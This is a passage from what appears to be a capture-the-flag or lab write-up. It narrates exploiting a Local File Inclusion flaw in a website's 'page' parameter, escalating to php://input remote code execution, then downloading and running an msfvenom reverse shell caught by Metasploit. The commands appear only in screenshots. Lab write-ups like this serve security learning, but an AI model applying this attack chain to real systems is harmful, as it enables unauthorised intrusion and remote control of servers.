# Exploitation

I started playing with the "page" parameter of the website and used LFISuite to try different file paths to see whether it was actually vulnerable to Local File Inclusion.

![](https://328597950-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC01qT6YExS9JZIncykrV%2Fuploads%2Fzdxr0JkBwU7jXkL1hzvl%2F2022-07-06_12-20.png?alt=media\&token=f2e365f4-96e1-462e-b10d-dd02d4ba4159)

As you can see I was able to read read the access logs for the webserver. These probably all my requests going out lol.&#x20;

My favorite tool to use for Local File Inclusion is kadimus. The tool kadimus performs different checks to test whether the application is vulnerable to different RCE methods.

![](https://328597950-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC01qT6YExS9JZIncykrV%2Fuploads%2FLhQfbKJG2aMHPpEItOgT%2F2022-07-06_12-31.png?alt=media\&token=e2201af8-04b1-43cb-a26b-18723795dae8)

The application is vulnerable to php\://input Remote Code Execution.

To test this out I will make the application output something random.

&#x20;

![I made the machine output "pwned"](https://328597950-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC01qT6YExS9JZIncykrV%2Fuploads%2Fjg5q3w9z5Fw6IveKj48E%2F2022-07-06_12-31_1.png?alt=media\&token=de98ff4d-1092-4c8d-9562-0cb30549fee9)

We can take this further to perform arbitrary commands and machinate a reverse shell.

![](https://328597950-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC01qT6YExS9JZIncykrV%2Fuploads%2FHQLc3BaDEEYpr5z9MusK%2F2022-07-06_12-37.png?alt=media\&token=799774af-4f6a-467a-94df-722916a43d28)

First I wanted to make sure what the arch of the system was in order to generate a reverse shell in MSFVENOM and then download it and execute it on the system.

![](https://328597950-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC01qT6YExS9JZIncykrV%2Fuploads%2Fo1syXhjusvxiuDJ58I4w%2F2022-07-06_12-43.png?alt=media\&token=bf29f4d8-b6e7-4100-b9eb-bbe550815526)

Started a python web server on port 443.&#x20;

![](https://328597950-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC01qT6YExS9JZIncykrV%2Fuploads%2FTQ66tRcze7O9GPohTZKR%2F2022-07-06_12-43_1.png?alt=media\&token=03d0e0f7-5b88-450a-802c-734f21e6a53e)

![](https://328597950-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC01qT6YExS9JZIncykrV%2Fuploads%2FsHRNXSzih9xKgDZLLWzn%2F2022-07-06_12-44.png?alt=media\&token=9ce4c0a7-a379-40a5-bccf-8444bb2bf510)

We see that we were able to download the reverse shell onto the machine, all there was to do is just execute it while my multi handler on Metasploit was listening.&#x20;

![](https://328597950-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC01qT6YExS9JZIncykrV%2Fuploads%2Fa5O9tOKduujSGsOLXlKw%2F2022-07-06_13-38.png?alt=media\&token=56ae6030-6a42-475a-9918-303aeaa503f0)

And boom. Reverse shell.&#x20;